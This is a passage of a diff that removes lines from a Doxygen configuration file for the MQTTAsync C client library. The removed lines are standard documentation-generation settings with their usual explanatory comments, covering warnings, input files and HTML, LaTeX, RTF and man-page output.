-# The GENERATE_TODOLIST tag can be used to enable (YES) or
-# disable (NO) the todo list. This list is created by putting \todo
-# commands in the documentation.
-
-GENERATE_TODOLIST      = YES
-
-# The GENERATE_TESTLIST tag can be used to enable (YES) or
-# disable (NO) the test list. This list is created by putting \test
-# commands in the documentation.
-
-GENERATE_TESTLIST      = YES
-
-# The GENERATE_BUGLIST tag can be used to enable (YES) or
-# disable (NO) the bug list. This list is created by putting \bug
-# commands in the documentation.
-
-GENERATE_BUGLIST       = YES
-
-# The GENERATE_DEPRECATEDLIST tag can be used to enable (YES) or
-# disable (NO) the deprecated list. This list is created by putting
-# \deprecated commands in the documentation.
-
-GENERATE_DEPRECATEDLIST= YES
-
-# The ENABLED_SECTIONS tag can be used to enable conditional
-# documentation sections, marked by \if sectionname ... \endif.
-
-ENABLED_SECTIONS       = MQTTAsync_main
-
-# The MAX_INITIALIZER_LINES tag determines the maximum number of lines
-# the initial value of a variable or macro consists of for it to appear in
-# the documentation. If the initializer consists of more lines than specified
-# here it will be hidden. Use a value of 0 to hide initializers completely.
-# The appearance of the initializer of individual variables and macros in the
-# documentation can be controlled using \showinitializer or \hideinitializer
-# command in the documentation regardless of this setting.
-
-MAX_INITIALIZER_LINES  = 30
-
-# Set the SHOW_USED_FILES tag to NO to disable the list of files generated
-# at the bottom of the documentation of classes and structs. If set to YES the
-# list will mention the files that were used to generate the documentation.
-
-SHOW_USED_FILES        = YES
-
-# Set the SHOW_FILES tag to NO to disable the generation of the Files page.
-# This will remove the Files entry from the Quick Index and from the
-# Folder Tree View (if specified). The default is YES.
-
-SHOW_FILES             = YES
-
-# Set the SHOW_NAMESPACES tag to NO to disable the generation of the
-# Namespaces page.
-# This will remove the Namespaces entry from the Quick Index
-# and from the Folder Tree View (if specified). The default is YES.
-
-SHOW_NAMESPACES        = YES
-
-# The FILE_VERSION_FILTER tag can be used to specify a program or script that
-# doxygen should invoke to get the current version for each file (typically from
-# the version control system). Doxygen will invoke the program by executing (via
-# popen()) the command <command> <input-file>, where <command> is the value of
-# the FILE_VERSION_FILTER tag, and <input-file> is the name of an input file
-# provided by doxygen. Whatever the program writes to standard output
-# is used as the file version. See the manual for examples.
-
-FILE_VERSION_FILTER    =
-
-# The LAYOUT_FILE tag can be used to specify a layout file which will be parsed
-# by doxygen. The layout file controls the global structure of the generated
-# output files in an output format independent way. To create the layout file
-# that represents doxygen's defaults, run doxygen with the -l option.
-# You can optionally specify a file name after the option, if omitted
-# DoxygenLayout.xml will be used as the name of the layout file.
-
-LAYOUT_FILE            =
-
-# The CITE_BIB_FILES tag can be used to specify one or more bib files
-# containing the references data. This must be a list of .bib files. The
-# .bib extension is automatically appended if omitted. Using this command
-# requires the bibtex tool to be installed. See also
-# http://en.wikipedia.org/wiki/BibTeX for more info. For LaTeX the style
-# of the bibliography can be controlled using LATEX_BIB_STYLE. To use this
-# feature you need bibtex and perl available in the search path.
-
-CITE_BIB_FILES         =
-
-#---------------------------------------------------------------------------
-# configuration options related to warning and progress messages
-#---------------------------------------------------------------------------
-
-# The QUIET tag can be used to turn on/off the messages that are generated
-# by doxygen. Possible values are YES and NO. If left blank NO is used.
-
-QUIET                  = NO
-
-# The WARNINGS tag can be used to turn on/off the warning messages that are
-# generated by doxygen. Possible values are YES and NO. If left blank
-# NO is used.
-
-WARNINGS               = YES
-
-# If WARN_IF_UNDOCUMENTED is set to YES, then doxygen will generate warnings
-# for undocumented members. If EXTRACT_ALL is set to YES then this flag will
-# automatically be disabled.
-
-WARN_IF_UNDOCUMENTED   = YES
-
-# If WARN_IF_DOC_ERROR is set to YES, doxygen will generate warnings for
-# potential errors in the documentation, such as not documenting some
-# parameters in a documented function, or documenting parameters that
-# don't exist or using markup commands wrongly.
-
-WARN_IF_DOC_ERROR      = YES
-
-# The WARN_NO_PARAMDOC option can be enabled to get warnings for
-# functions that are documented, but have no documentation for their parameters
-# or return value. If set to NO (the default) doxygen will only warn about
-# wrong or incomplete parameter documentation, but not about the absence of
-# documentation.
-
-WARN_NO_PARAMDOC       = NO
-
-# The WARN_FORMAT tag determines the format of the warning messages that
-# doxygen can produce. The string should contain the $file, $line, and $text
-# tags, which will be replaced by the file and line number from which the
-# warning originated and the warning text. Optionally the format may contain
-# $version, which will be replaced by the version of the file (if it could
-# be obtained via FILE_VERSION_FILTER)
-
-WARN_FORMAT            = "$file:$line: $text"
-
-# The WARN_LOGFILE tag can be used to specify a file to which warning
-# and error messages should be written. If left blank the output is written
-# to stderr.
-
-WARN_LOGFILE           =
-
-#---------------------------------------------------------------------------
-# configuration options related to the input files
-#---------------------------------------------------------------------------
-
-# The INPUT tag can be used to specify the files and/or directories that contain
-# documented source files. You may enter file names like "myfile.cpp" or
-# directories like "/usr/src/myproject". Separate the files or directories
-# with spaces.
-
-INPUT                  = MQTTAsync.h \
-                         MQTTClientPersistence.h
-
-# This tag can be used to specify the character encoding of the source files
-# that doxygen parses. Internally doxygen uses the UTF-8 encoding, which is
-# also the default input encoding. Doxygen uses libiconv (or the iconv built
-# into libc) for the transcoding. See http://www.gnu.org/software/libiconv for
-# the list of possible encodings.
-
-INPUT_ENCODING         = UTF-8
-
-# If the value of the INPUT tag contains directories, you can use the
-# FILE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank the following patterns are tested:
-# *.c *.cc *.cxx *.cpp *.c++ *.d *.java *.ii *.ixx *.ipp *.i++ *.inl *.h *.hh
-# *.hxx *.hpp *.h++ *.idl *.odl *.cs *.php *.php3 *.inc *.m *.mm *.dox *.py
-# *.f90 *.f *.for *.vhd *.vhdl
-
-FILE_PATTERNS          =
-
-# The RECURSIVE tag can be used to turn specify whether or not subdirectories
-# should be searched for input files as well. Possible values are YES and NO.
-# If left blank NO is used.
-
-RECURSIVE              = NO
-
-# The EXCLUDE tag can be used to specify files and/or directories that should be
-# excluded from the INPUT source files. This way you can easily exclude a
-# subdirectory from a directory tree whose root is specified with the INPUT tag.
-# Note that relative paths are relative to the directory from which doxygen is
-# run.
-
-EXCLUDE                =
-
-# The EXCLUDE_SYMLINKS tag can be used to select whether or not files or
-# directories that are symbolic links (a Unix file system feature) are excluded
-# from the input.
-
-EXCLUDE_SYMLINKS       = NO
-
-# If the value of the INPUT tag contains directories, you can use the
-# EXCLUDE_PATTERNS tag to specify one or more wildcard patterns to exclude
-# certain files from those directories. Note that the wildcards are matched
-# against the file with absolute path, so to exclude all test directories
-# for example use the pattern */test/*
-
-EXCLUDE_PATTERNS       =
-
-# The EXCLUDE_SYMBOLS tag can be used to specify one or more symbol names
-# (namespaces, classes, functions, etc.) that should be excluded from the
-# output. The symbol name can be a fully qualified name, a word, or if the
-# wildcard * is used, a substring. Examples: ANamespace, AClass,
-# AClass::ANamespace, ANamespace::*Test
-
-EXCLUDE_SYMBOLS        =
-
-# The EXAMPLE_PATH tag can be used to specify one or more files or
-# directories that contain example code fragments that are included (see
-# the \include command).
-
-EXAMPLE_PATH           =
-
-# If the value of the EXAMPLE_PATH tag contains directories, you can use the
-# EXAMPLE_PATTERNS tag to specify one or more wildcard pattern (like *.cpp
-# and *.h) to filter out the source-files in the directories. If left
-# blank all files are included.
-
-EXAMPLE_PATTERNS       = *
-
-# If the EXAMPLE_RECURSIVE tag is set to YES then subdirectories will be
-# searched for input files to be used with the \include or \dontinclude
-# commands irrespective of the value of the RECURSIVE tag.
-# Possible values are YES and NO. If left blank NO is used.
-
-EXAMPLE_RECURSIVE      = NO
-
-# The IMAGE_PATH tag can be used to specify one or more files or
-# directories that contain image that are included in the documentation (see
-# the \image command).
-
-IMAGE_PATH             =
-
-# The INPUT_FILTER tag can be used to specify a program that doxygen should
-# invoke to filter for each input file. Doxygen will invoke the filter program
-# by executing (via popen()) the command <filter> <input-file>, where <filter>
-# is the value of the INPUT_FILTER tag, and <input-file> is the name of an
-# input file. Doxygen will then use the output that the filter program writes
-# to standard output.
-# If FILTER_PATTERNS is specified, this tag will be
-# ignored.
-
-INPUT_FILTER           =
-
-# The FILTER_PATTERNS tag can be used to specify filters on a per file pattern
-# basis.
-# Doxygen will compare the file name with each pattern and apply the
-# filter if there is a match.
-# The filters are a list of the form:
-# pattern=filter (like *.cpp=my_cpp_filter). See INPUT_FILTER for further
-# info on how filters are used. If FILTER_PATTERNS is empty or if
-# non of the patterns match the file name, INPUT_FILTER is applied.
-
-FILTER_PATTERNS        =
-
-# If the FILTER_SOURCE_FILES tag is set to YES, the input filter (if set using
-# INPUT_FILTER) will be used to filter the input files when producing source
-# files to browse (i.e. when SOURCE_BROWSER is set to YES).
-
-FILTER_SOURCE_FILES    = NO
-
-# The FILTER_SOURCE_PATTERNS tag can be used to specify source filters per file
-# pattern. A pattern will override the setting for FILTER_PATTERN (if any)
-# and it is also possible to disable source filtering for a specific pattern
-# using *.ext= (so without naming a filter). This option only has effect when
-# FILTER_SOURCE_FILES is enabled.
-
-FILTER_SOURCE_PATTERNS =
-
-#---------------------------------------------------------------------------
-# configuration options related to source browsing
-#---------------------------------------------------------------------------
-
-# If the SOURCE_BROWSER tag is set to YES then a list of source files will
-# be generated. Documented entities will be cross-referenced with these sources.
-# Note: To get rid of all source code in the generated output, make sure also
-# VERBATIM_HEADERS is set to NO.
-
-SOURCE_BROWSER         = NO
-
-# Setting the INLINE_SOURCES tag to YES will include the body
-# of functions and classes directly in the documentation.
-
-INLINE_SOURCES         = NO
-
-# Setting the STRIP_CODE_COMMENTS tag to YES (the default) will instruct
-# doxygen to hide any special comment blocks from generated source code
-# fragments. Normal C, C++ and Fortran comments will always remain visible.
-
-STRIP_CODE_COMMENTS    = YES
-
-# If the REFERENCED_BY_RELATION tag is set to YES
-# then for each documented function all documented
-# functions referencing it will be listed.
-
-REFERENCED_BY_RELATION = NO
-
-# If the REFERENCES_RELATION tag is set to YES
-# then for each documented function all documented entities
-# called/used by that function will be listed.
-
-REFERENCES_RELATION    = NO
-
-# If the REFERENCES_LINK_SOURCE tag is set to YES (the default)
-# and SOURCE_BROWSER tag is set to YES, then the hyperlinks from
-# functions in REFERENCES_RELATION and REFERENCED_BY_RELATION lists will
-# link to the source code.
-# Otherwise they will link to the documentation.
-
-REFERENCES_LINK_SOURCE = YES
-
-# If the USE_HTAGS tag is set to YES then the references to source code
-# will point to the HTML generated by the htags(1) tool instead of doxygen
-# built-in source browser. The htags tool is part of GNU's global source
-# tagging system (see http://www.gnu.org/software/global/global.html). You
-# will need version 4.8.6 or higher.
-
-USE_HTAGS              = NO
-
-# If the VERBATIM_HEADERS tag is set to YES (the default) then Doxygen
-# will generate a verbatim copy of the header file for each class for
-# which an include is specified. Set to NO to disable this.
-
-VERBATIM_HEADERS       = YES
-
-#---------------------------------------------------------------------------
-# configuration options related to the alphabetical class index
-#---------------------------------------------------------------------------
-
-# If the ALPHABETICAL_INDEX tag is set to YES, an alphabetical index
-# of all compounds will be generated. Enable this if the project
-# contains a lot of classes, structs, unions or interfaces.
-
-ALPHABETICAL_INDEX     = NO
-
-# If the alphabetical index is enabled (see ALPHABETICAL_INDEX) then
-# the COLS_IN_ALPHA_INDEX tag can be used to specify the number of columns
-# in which this list will be split (can be a number in the range [1..20])
-
-COLS_IN_ALPHA_INDEX    = 5
-
-# In case all classes in a project start with a common prefix, all
-# classes will be put under the same header in the alphabetical index.
-# The IGNORE_PREFIX tag can be used to specify one or more prefixes that
-# should be ignored while generating the index headers.
-
-IGNORE_PREFIX          =
-
-#---------------------------------------------------------------------------
-# configuration options related to the HTML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_HTML tag is set to YES (the default) Doxygen will
-# generate HTML output.
-
-GENERATE_HTML          = YES
-
-# The HTML_OUTPUT tag is used to specify where the HTML docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `html' will be used as the default path.
-
-HTML_OUTPUT            = html
-
-# The HTML_FILE_EXTENSION tag can be used to specify the file extension for
-# each generated HTML page (for example: .htm,.php,.asp). If it is left blank
-# doxygen will generate files with .html extension.
-
-HTML_FILE_EXTENSION    = .html
-
-# The HTML_HEADER tag can be used to specify a personal HTML header for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard header. Note that when using a custom header you are responsible
-#  for the proper inclusion of any scripts and style sheets that doxygen
-# needs, which is dependent on the configuration options used.
-# It is advised to generate a default header using "doxygen -w html
-# header.html footer.html stylesheet.css YourConfigFile" and then modify
-# that header. Note that the header is subject to change so you typically
-# have to redo this when upgrading to a newer version of doxygen or when
-# changing the value of configuration settings such as GENERATE_TREEVIEW!
-
-HTML_HEADER            =
-
-# The HTML_FOOTER tag can be used to specify a personal HTML footer for
-# each generated HTML page. If it is left blank doxygen will generate a
-# standard footer.
-
-HTML_FOOTER            =
-
-# The HTML_STYLESHEET tag can be used to specify a user-defined cascading
-# style sheet that is used by each HTML page. It can be used to
-# fine-tune the look of the HTML output. If the tag is left blank doxygen
-# will generate a default style sheet. Note that doxygen will try to copy
-# the style sheet file to the HTML output directory, so don't put your own
-# style sheet in the HTML output directory as well, or it will be erased!
-
-HTML_STYLESHEET        =
-
-# The HTML_EXTRA_FILES tag can be used to specify one or more extra images or
-# other source files which should be copied to the HTML output directory. Note
-# that these files will be copied to the base HTML output directory. Use the
-# $relpath$ marker in the HTML_HEADER and/or HTML_FOOTER files to load these
-# files. In the HTML_STYLESHEET file, use the file name only. Also note that
-# the files will be copied as-is; there are no commands or markers available.
-
-HTML_EXTRA_FILES       =
-
-# The HTML_COLORSTYLE_HUE tag controls the color of the HTML output.
-# Doxygen will adjust the colors in the style sheet and background images
-# according to this color. Hue is specified as an angle on a colorwheel,
-# see http://en.wikipedia.org/wiki/Hue for more information.
-# For instance the value 0 represents red, 60 is yellow, 120 is green,
-# 180 is cyan, 240 is blue, 300 purple, and 360 is red again.
-# The allowed range is 0 to 359.
-
-HTML_COLORSTYLE_HUE    = 220
-
-# The HTML_COLORSTYLE_SAT tag controls the purity (or saturation) of
-# the colors in the HTML output. For a value of 0 the output will use
-# grayscales only. A value of 255 will produce the most vivid colors.
-
-HTML_COLORSTYLE_SAT    = 100
-
-# The HTML_COLORSTYLE_GAMMA tag controls the gamma correction applied to
-# the luminance component of the colors in the HTML output. Values below
-# 100 gradually make the output lighter, whereas values above 100 make
-# the output darker. The value divided by 100 is the actual gamma applied,
-# so 80 represents a gamma of 0.8, The value 220 represents a gamma of 2.2,
-# and 100 does not change the gamma.
-
-HTML_COLORSTYLE_GAMMA  = 80
-
-# If the HTML_TIMESTAMP tag is set to YES then the footer of each generated HTML
-# page will contain the date and time when the page was generated. Setting
-# this to NO can help when comparing the output of multiple runs.
-
-HTML_TIMESTAMP         = YES
-
-# If the HTML_DYNAMIC_SECTIONS tag is set to YES then the generated HTML
-# documentation will contain sections that can be hidden and shown after the
-# page has loaded.
-
-HTML_DYNAMIC_SECTIONS  = NO
-
-# With HTML_INDEX_NUM_ENTRIES one can control the preferred number of
-# entries shown in the various tree structured indices initially; the user
-# can expand and collapse entries dynamically later on. Doxygen will expand
-# the tree to such a level that at most the specified number of entries are
-# visible (unless a fully collapsed tree already exceeds this amount).
-# So setting the number of entries 1 will produce a full collapsed tree by
-# default. 0 is a special value representing an infinite number of entries
-# and will result in a full expanded tree by default.
-
-HTML_INDEX_NUM_ENTRIES = 100
-
-# If the GENERATE_DOCSET tag is set to YES, additional index files
-# will be generated that can be used as input for Apple's Xcode 3
-# integrated development environment, introduced with OSX 10.5 (Leopard).
-# To create a documentation set, doxygen will generate a Makefile in the
-# HTML output directory. Running make will produce the docset in that
-# directory and running "make install" will install the docset in
-# ~/Library/Developer/Shared/Documentation/DocSets so that Xcode will find
-# it at startup.
-# See http://developer.apple.com/tools/creatingdocsetswithdoxygen.html
-# for more information.
-
-GENERATE_DOCSET        = NO
-
-# When GENERATE_DOCSET tag is set to YES, this tag determines the name of the
-# feed. A documentation feed provides an umbrella under which multiple
-# documentation sets from a single provider (such as a company or product suite)
-# can be grouped.
-
-DOCSET_FEEDNAME        = "Doxygen generated docs"
-
-# When GENERATE_DOCSET tag is set to YES, this tag specifies a string that
-# should uniquely identify the documentation set bundle. This should be a
-# reverse domain-name style string, e.g. com.mycompany.MyDocSet. Doxygen
-# will append .docset to the name.
-
-DOCSET_BUNDLE_ID       = org.doxygen.Project
-
-# When GENERATE_PUBLISHER_ID tag specifies a string that should uniquely identify
-# the documentation publisher. This should be a reverse domain-name style
-# string, e.g. com.mycompany.MyDocSet.documentation.
-
-DOCSET_PUBLISHER_ID    = org.doxygen.Publisher
-
-# The GENERATE_PUBLISHER_NAME tag identifies the documentation publisher.
-
-DOCSET_PUBLISHER_NAME  = Publisher
-
-# If the GENERATE_HTMLHELP tag is set to YES, additional index files
-# will be generated that can be used as input for tools like the
-# Microsoft HTML help workshop to generate a compiled HTML help file (.chm)
-# of the generated HTML documentation.
-
-GENERATE_HTMLHELP      = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_FILE tag can
-# be used to specify the file name of the resulting .chm file. You
-# can add a path in front of the file if the result should not be
-# written to the html output directory.
-
-CHM_FILE               =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the HHC_LOCATION tag can
-# be used to specify the location (absolute path including file name) of
-# the HTML help compiler (hhc.exe). If non-empty doxygen will try to run
-# the HTML help compiler on the generated index.hhp.
-
-HHC_LOCATION           =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the GENERATE_CHI flag
-# controls if a separate .chi index file is generated (YES) or that
-# it should be included in the master .chm file (NO).
-
-GENERATE_CHI           = NO
-
-# If the GENERATE_HTMLHELP tag is set to YES, the CHM_INDEX_ENCODING
-# is used to encode HtmlHelp index (hhk), content (hhc) and project file
-# content.
-
-CHM_INDEX_ENCODING     =
-
-# If the GENERATE_HTMLHELP tag is set to YES, the BINARY_TOC flag
-# controls whether a binary table of contents is generated (YES) or a
-# normal table of contents (NO) in the .chm file.
-
-BINARY_TOC             = NO
-
-# The TOC_EXPAND flag can be set to YES to add extra items for group members
-# to the contents of the HTML help documentation and to the tree view.
-
-TOC_EXPAND             = NO
-
-# If the GENERATE_QHP tag is set to YES and both QHP_NAMESPACE and
-# QHP_VIRTUAL_FOLDER are set, an additional index file will be generated
-# that can be used as input for Qt's qhelpgenerator to generate a
-# Qt Compressed Help (.qch) of the generated HTML documentation.
-
-GENERATE_QHP           = NO
-
-# If the QHG_LOCATION tag is specified, the QCH_FILE tag can
-# be used to specify the file name of the resulting .qch file.
-# The path specified is relative to the HTML output folder.
-
-QCH_FILE               =
-
-# The QHP_NAMESPACE tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#namespace
-
-QHP_NAMESPACE          =
-
-# The QHP_VIRTUAL_FOLDER tag specifies the namespace to use when generating
-# Qt Help Project output. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#virtual-folders
-
-QHP_VIRTUAL_FOLDER     = doc
-
-# If QHP_CUST_FILTER_NAME is set, it specifies the name of a custom filter to
-# add. For more information please see
-# http://doc.trolltech.com/qthelpproject.html#custom-filters
-
-QHP_CUST_FILTER_NAME   =
-
-# The QHP_CUST_FILT_ATTRS tag specifies the list of the attributes of the
-# custom filter to add. For more information please see
-# <a href="http://doc.trolltech.com/qthelpproject.html#custom-filters">
-# Qt Help Project / Custom Filters</a>.
-
-QHP_CUST_FILTER_ATTRS  =
-
-# The QHP_SECT_FILTER_ATTRS tag specifies the list of the attributes this
-# project's
-# filter section matches.
-# <a href="http://doc.trolltech.com/qthelpproject.html#filter-attributes">
-# Qt Help Project / Filter Attributes</a>.
-
-QHP_SECT_FILTER_ATTRS  =
-
-# If the GENERATE_QHP tag is set to YES, the QHG_LOCATION tag can
-# be used to specify the location of Qt's qhelpgenerator.
-# If non-empty doxygen will try to run qhelpgenerator on the generated
-# .qhp file.
-
-QHG_LOCATION           =
-
-# If the GENERATE_ECLIPSEHELP tag is set to YES, additional index files
-#  will be generated, which together with the HTML files, form an Eclipse help
-# plugin. To install this plugin and make it available under the help contents
-# menu in Eclipse, the contents of the directory containing the HTML and XML
-# files needs to be copied into the plugins directory of eclipse. The name of
-# the directory within the plugins directory should be the same as
-# the ECLIPSE_DOC_ID value. After copying Eclipse needs to be restarted before
-# the help appears.
-
-GENERATE_ECLIPSEHELP   = NO
-
-# A unique identifier for the eclipse help plugin. When installing the plugin
-# the directory name containing the HTML and XML files should also have
-# this name.
-
-ECLIPSE_DOC_ID         = org.doxygen.Project
-
-# The DISABLE_INDEX tag can be used to turn on/off the condensed index (tabs)
-# at top of each HTML page. The value NO (the default) enables the index and
-# the value YES disables it. Since the tabs have the same information as the
-# navigation tree you can set this option to NO if you already set
-# GENERATE_TREEVIEW to YES.
-
-DISABLE_INDEX          = NO
-
-# The GENERATE_TREEVIEW tag is used to specify whether a tree-like index
-# structure should be generated to display hierarchical information.
-# If the tag value is set to YES, a side panel will be generated
-# containing a tree-like index structure (just like the one that
-# is generated for HTML Help). For this to work a browser that supports
-# JavaScript, DHTML, CSS and frames is required (i.e. any modern browser).
-# Windows users are probably better off using the HTML help feature.
-# Since the tree basically has the same information as the tab index you
-# could consider to set DISABLE_INDEX to NO when enabling this option.
-
-GENERATE_TREEVIEW      = NONE
-
-# The ENUM_VALUES_PER_LINE tag can be used to set the number of enum values
-# (range [0,1..20]) that doxygen will group on one line in the generated HTML
-# documentation. Note that a value of 0 will completely suppress the enum
-# values from appearing in the overview section.
-
-ENUM_VALUES_PER_LINE   = 4
-
-# If the treeview is enabled (see GENERATE_TREEVIEW) then this tag can be
-# used to set the initial width (in pixels) of the frame in which the tree
-# is shown.
-
-TREEVIEW_WIDTH         = 250
-
-# When the EXT_LINKS_IN_WINDOW option is set to YES doxygen will open
-# links to external symbols imported via tag files in a separate window.
-
-EXT_LINKS_IN_WINDOW    = NO
-
-# Use this tag to change the font size of Latex formulas included
-# as images in the HTML documentation. The default is 10. Note that
-# when you change the font size after a successful doxygen run you need
-# to manually remove any form_*.png images from the HTML output directory
-# to force them to be regenerated.
-
-FORMULA_FONTSIZE       = 10
-
-# Use the FORMULA_TRANPARENT tag to determine whether or not the images
-# generated for formulas are transparent PNGs. Transparent PNGs are
-# not supported properly for IE 6.0, but are supported on all modern browsers.
-# Note that when changing this option you need to delete any form_*.png files
-# in the HTML output before the changes have effect.
-
-FORMULA_TRANSPARENT    = YES
-
-# Enable the USE_MATHJAX option to render LaTeX formulas using MathJax
-# (see http://www.mathjax.org) which uses client side Javascript for the
-# rendering instead of using prerendered bitmaps. Use this if you do not
-# have LaTeX installed or if you want to formulas look prettier in the HTML
-# output. When enabled you may also need to install MathJax separately and
-# configure the path to it using the MATHJAX_RELPATH option.
-
-USE_MATHJAX            = NO
-
-# When MathJax is enabled you need to specify the location relative to the
-# HTML output directory using the MATHJAX_RELPATH option. The destination
-# directory should contain the MathJax.js script. For instance, if the mathjax
-# directory is located at the same level as the HTML output directory, then
-# MATHJAX_RELPATH should be ../mathjax. The default value points to
-# the MathJax Content Delivery Network so you can quickly see the result without
-# installing MathJax.
-# However, it is strongly recommended to install a local
-# copy of MathJax from http://www.mathjax.org before deployment.
-
-MATHJAX_RELPATH        = http://cdn.mathjax.org/mathjax/latest
-
-# The MATHJAX_EXTENSIONS tag can be used to specify one or MathJax extension
-# names that should be enabled during MathJax rendering.
-
-MATHJAX_EXTENSIONS     =
-
-# When the SEARCHENGINE tag is enabled doxygen will generate a search box
-# for the HTML output. The underlying search engine uses javascript
-# and DHTML and should work on any modern browser. Note that when using
-# HTML help (GENERATE_HTMLHELP), Qt help (GENERATE_QHP), or docsets
-# (GENERATE_DOCSET) there is already a search function so this one should
-# typically be disabled. For large projects the javascript based search engine
-# can be slow, then enabling SERVER_BASED_SEARCH may provide a better solution.
-
-SEARCHENGINE           = YES
-
-# When the SERVER_BASED_SEARCH tag is enabled the search engine will be
-# implemented using a PHP enabled web server instead of at the web client
-# using Javascript. Doxygen will generate the search PHP script and index
-# file to put on the web server. The advantage of the server
-# based approach is that it scales better to large projects and allows
-# full text search. The disadvantages are that it is more difficult to setup
-# and does not have live searching capabilities.
-
-SERVER_BASED_SEARCH    = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the LaTeX output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_LATEX tag is set to YES (the default) Doxygen will
-# generate Latex output.
-
-GENERATE_LATEX         = NO
-
-# The LATEX_OUTPUT tag is used to specify where the LaTeX docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `latex' will be used as the default path.
-
-LATEX_OUTPUT           = latex
-
-# The LATEX_CMD_NAME tag can be used to specify the LaTeX command name to be
-# invoked. If left blank `latex' will be used as the default command name.
-# Note that when enabling USE_PDFLATEX this option is only used for
-# generating bitmaps for formulas in the HTML output, but not in the
-# Makefile that is written to the output directory.
-
-LATEX_CMD_NAME         = latex
-
-# The MAKEINDEX_CMD_NAME tag can be used to specify the command name to
-# generate index for LaTeX. If left blank `makeindex' will be used as the
-# default command name.
-
-MAKEINDEX_CMD_NAME     = makeindex
-
-# If the COMPACT_LATEX tag is set to YES Doxygen generates more compact
-# LaTeX documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_LATEX          = NO
-
-# The PAPER_TYPE tag can be used to set the paper type that is used
-# by the printer. Possible values are: a4, letter, legal and
-# executive. If left blank a4wide will be used.
-
-PAPER_TYPE             = a4wide
-
-# The EXTRA_PACKAGES tag can be to specify one or more names of LaTeX
-# packages that should be included in the LaTeX output.
-
-EXTRA_PACKAGES         =
-
-# The LATEX_HEADER tag can be used to specify a personal LaTeX header for
-# the generated latex document. The header should contain everything until
-# the first chapter. If it is left blank doxygen will generate a
-# standard header. Notice: only use this tag if you know what you are doing!
-
-LATEX_HEADER           =
-
-# The LATEX_FOOTER tag can be used to specify a personal LaTeX footer for
-# the generated latex document. The footer should contain everything after
-# the last chapter. If it is left blank doxygen will generate a
-# standard footer. Notice: only use this tag if you know what you are doing!
-
-LATEX_FOOTER           =
-
-# If the PDF_HYPERLINKS tag is set to YES, the LaTeX that is generated
-# is prepared for conversion to pdf (using ps2pdf). The pdf file will
-# contain links (just like the HTML output) instead of page references
-# This makes the output suitable for online browsing using a pdf viewer.
-
-PDF_HYPERLINKS         = YES
-
-# If the USE_PDFLATEX tag is set to YES, pdflatex will be used instead of
-# plain latex in the generated Makefile. Set this option to YES to get a
-# higher quality PDF documentation.
-
-USE_PDFLATEX           = YES
-
-# If the LATEX_BATCHMODE tag is set to YES, doxygen will add the \\batchmode.
-# command to the generated LaTeX files. This will instruct LaTeX to keep
-# running if errors occur, instead of asking the user for help.
-# This option is also used when generating formulas in HTML.
-
-LATEX_BATCHMODE        = NO
-
-# If LATEX_HIDE_INDICES is set to YES then doxygen will not
-# include the index chapters (such as File Index, Compound Index, etc.)
-# in the output.
-
-LATEX_HIDE_INDICES     = NO
-
-# If LATEX_SOURCE_CODE is set to YES then doxygen will include
-# source code with syntax highlighting in the LaTeX output.
-# Note that which sources are shown also depends on other settings
-# such as SOURCE_BROWSER.
-
-LATEX_SOURCE_CODE      = NO
-
-# The LATEX_BIB_STYLE tag can be used to specify the style to use for the
-# bibliography, e.g. plainnat, or ieeetr. The default style is "plain". See
-# http://en.wikipedia.org/wiki/BibTeX for more info.
-
-LATEX_BIB_STYLE        = plain
-
-#---------------------------------------------------------------------------
-# configuration options related to the RTF output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_RTF tag is set to YES Doxygen will generate RTF output
-# The RTF output is optimized for Word 97 and may not look very pretty with
-# other RTF readers or editors.
-
-GENERATE_RTF           = NO
-
-# The RTF_OUTPUT tag is used to specify where the RTF docs will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `rtf' will be used as the default path.
-
-RTF_OUTPUT             = rtf
-
-# If the COMPACT_RTF tag is set to YES Doxygen generates more compact
-# RTF documents. This may be useful for small projects and may help to
-# save some trees in general.
-
-COMPACT_RTF            = NO
-
-# If the RTF_HYPERLINKS tag is set to YES, the RTF that is generated
-# will contain hyperlink fields. The RTF file will
-# contain links (just like the HTML output) instead of page references.
-# This makes the output suitable for online browsing using WORD or other
-# programs which support those fields.
-# Note: wordpad (write) and others do not support links.
-
-RTF_HYPERLINKS         = NO
-
-# Load style sheet definitions from file. Syntax is similar to doxygen's
-# config file, i.e. a series of assignments. You only have to provide
-# replacements, missing definitions are set to their default value.
-
-RTF_STYLESHEET_FILE    =
-
-# Set optional variables used in the generation of an rtf document.
-# Syntax is similar to doxygen's config file.
-
-RTF_EXTENSIONS_FILE    =
-
-#---------------------------------------------------------------------------
-# configuration options related to the man page output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_MAN tag is set to YES (the default) Doxygen will
-# generate man pages
-
-GENERATE_MAN           = NO
-
-# The MAN_OUTPUT tag is used to specify where the man pages will be put.
-# If a relative path is entered the value of OUTPUT_DIRECTORY will be
-# put in front of it. If left blank `man' will be used as the default path.
-
-MAN_OUTPUT             = man
-
-# The MAN_EXTENSION tag determines the extension that is added to
-# the generated man pages (default is the subroutine's section .3)
-
-MAN_EXTENSION          = .3
-
-# If the MAN_LINKS tag is set to YES and Doxygen generates man output,
-# then it will generate one additional man file for each entity
-# documented in the real man page(s). These additional files
-# only source the real man page, but without them the man command
-# would be unable to find the correct page. The default is NO.
-
-MAN_LINKS              = NO
-
-#---------------------------------------------------------------------------
-# configuration options related to the XML output
-#---------------------------------------------------------------------------
-
-# If the GENERATE_XML tag is set to YES Doxygen will
-# generate an XML file that captures the structure of
-# the code including all documentation.
-
-GENERATE_XML           = NO
-
-# The XML_OUTPUT tag is used to specify where the XML pages will be put.
